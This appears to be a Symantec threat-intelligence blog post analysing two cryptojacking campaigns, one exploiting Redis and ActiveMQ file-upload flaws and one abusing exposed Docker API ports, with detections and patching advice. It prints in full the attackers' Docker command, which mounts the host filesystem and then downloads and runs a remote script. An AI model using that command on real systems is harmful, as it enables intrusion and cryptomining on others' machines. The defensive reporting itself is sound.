Cryptojacking Criminals Are Using Multiple Techniques to Install Coinminers
Symantec has been tracking several cryptojacking campaigns that use bugs and exposed API ports to compromise computers.
Symantec has blocked more than 309 million cryptojacking attempts in the last quarter and this number is likely to increase further as cyber criminals use every possible way to get their coinminers onto users’ computers. In our work to protect customers from cryptojacking, we have been tracking multiple campaigns taking advantage of various software vulnerabilities, as well as exposed APIs, to install miners on computers. We’ll take a closer look at couple of these campaigns in this blog.
Campaign 1: Targeting vulnerabilities
Initial alert
From various sensors that Symantec has deployed around the world we noticed an attack on port 6379 exploiting an arbitrary file upload vulnerability in the open-source in-memory data structure store Redis.
The Redis vulnerability can be exploited by attackers to upload arbitrary files, which allows them to create entries in the crontab file. This allows the attackers to schedule cron jobs that download and execute a Bash script file hosted on Pastebin every minute. The Bash script downloads Base64-encoded data, also hosted on Pastebin. The decoded data is actually another Bash script that performs several actions including, but not limited to:
1. Ending other coin-mining processes running on the system
2. Downloading and running its own coin-mining programs
3. Setting up cron jobs, similar to the one shown in Figure 1
4. Adding iptables rule to restrict access to port 6379 from the internet
Infection module
One of the functions found in the decoded Bash script is a single line of Python code that downloads another Base64-encoded Python script from Pastebin.
The downloaded script, when decoded, reveals the campaign’s spreading mechanism, which makes use of a couple of vulnerabilities to widen its roots. The first vulnerability is an arbitrary file upload vulnerability (CVE-2016–3088) in the Fileserver web application in the open-source message broker ActiveMQ.
The second vulnerability is the arbitrary file upload vulnerability in Redis, which was the initial source for tracking down this campaign.
Also included in the Python script was a URL used to retrieve a list of target IP addresses. The IP addresses were downloaded from an image hosting site (thyrsi[dot]com).
The wallet address used in this campaign has a couple of worker IDs; one for the XMR-Stak coinminer (sixx) and another for the XMRig coinminer (sixy). Although when querying the wallet address online we get a few more workers.
Campaign 2: A different tactic via Docker
We also found a similar campaign where attackers are targeting open Docker API ports to download and execute coinminers. They start by scanning the internet for open ports 2375 (Docker REST API — HTTP port) and 2376 (Docker REST API — HTTPS port) using the Masscan tool. When an open instance is found, the attackers send a request to create a container with the following command:
docker -H tcp://$HOSTLINE run — rm -v /:/mnt alpine chroot /mnt /bin/sh -c “wget http://IP/auto.sh -O /auto.sh;chmod 777 /auto.sh;sh /auto.sh;”
The “auto.sh” file performs several actions including, but not limited to:
1. Install packages like systemd, cURL, Masscan, iproute2, OpenSSH
2. Add the users “richard” and “frank” to the system
3. Establish backdoor access to the machine by modifying the SSH config file to listen on port 22 as well as 7878, enabling password authentication, and adding pubic keys to the SSH authorized_key file
4. Use Masscan to scan the subnet (gathered from the infected machine) for other open 2375 and 2376 ports and use this information to spread using open Docker API ports
Finally, it downloads a script from Pastebin that ends other mining-related processes on the system and runs its own binaries for mining the Monero cryptocurrency.
Protection
The following Symantec Intrusion Prevention System (IPS) detections protect customers from these attacks:
Attack: Redis UnAuthorized File Upload
Web Attack: Apache ActiveMQ CVE-2016–3088
Web Attack: Malicious Payload Upload 6
System Infected: Miner.Bitcoinminer Activity 7
Figure 7 shows Symantec IPS detections protecting users from these coin-mining attacks.
Mitigation
Vendors have since published updates to address the vulnerabilities discussed in this blog. Symantec advises users to ensure their computers and software are fully patched. Docker users should avoid exposing Docker REST API ports on the internet and configure Docker to use TLS authentication to avoid attackers misusing it.
Further reading
For more information on cryptojacking, read the following:
Cryptojacking: A Modern Cash Cow
Check out the Security Response blog and follow Threat Intel on Twitter to keep up-to-date with the latest happenings in the world of threat intelligence and cyber security.
Like this story? Recommend it by hitting the heart button so others on Medium see it, and follow Threat Intel on Medium for more great content.